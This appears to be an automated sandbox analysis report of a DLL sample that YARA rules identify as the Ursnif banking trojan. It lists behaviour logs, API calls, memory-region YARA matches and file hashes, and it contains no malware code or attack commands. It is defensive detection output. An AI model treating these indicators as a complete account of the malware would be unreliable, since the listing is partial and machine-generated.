Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_046217C3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

3_2_046217C3

Source: C:\Windows\System32\loaddll32.exe

0_2_10001456

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_0464104F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_10001F0E

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

ID:	444655
Product:	CloudBasic
Start time:	14:28:41
Start date:	06.07.2021
Sample:	2790000.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	c40709736c45151601de6db50f379d8b
SHA1:	96fcdac225106f13726477d898a4939ccfcd4781
SHA256:	56b998448c4cd2240edcf0446c8bc7da54f4568ba99d1f3774c43af202aac995
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Windows Analysis Report 2790000.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs